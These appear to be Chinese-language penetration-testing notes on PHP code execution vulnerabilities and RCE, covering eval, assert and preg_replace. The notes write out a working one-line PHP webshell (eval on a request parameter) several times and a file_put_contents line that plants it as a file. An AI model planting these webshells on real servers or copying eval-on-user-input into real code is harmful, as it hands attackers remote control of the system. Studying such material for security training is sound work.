一、代码执行漏洞原理
代码执行漏洞原理:用户输入的数据被当做后端代码执行
#一句话木马的本质就是一个代码执行漏洞
#用户输入的数据被当做代码进行执行。
<?php @eval($_REQUEST[8]);?>
RCE(Remote Command/Code Execute):远程命令执行或者远程代码执行,RCE的定义比较广,只要渗透的最终情况可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE
二、代码执行函数解析
PHP函数存在许多函数可以做到代码执行:
#eval()是代码执行使用的最多的
#eval()可以多行执行,eval('vardump(8);phpinfo();')
<?php
@eval($_REQUEST[8]);
?>
#与eval()类似,无法多行执行
<?php
@assert($_REQUEST[8]);
?>
#如何执行多行
#传参执行写文件函数,生成可执行多行代码的一句话木马
file_put_contents('1.php','<?php @eval($_REQUEST[8]);?>')
#正则替换函数
#preg_replace(替换的正则表达式,替换为什么,要被替换的字符串)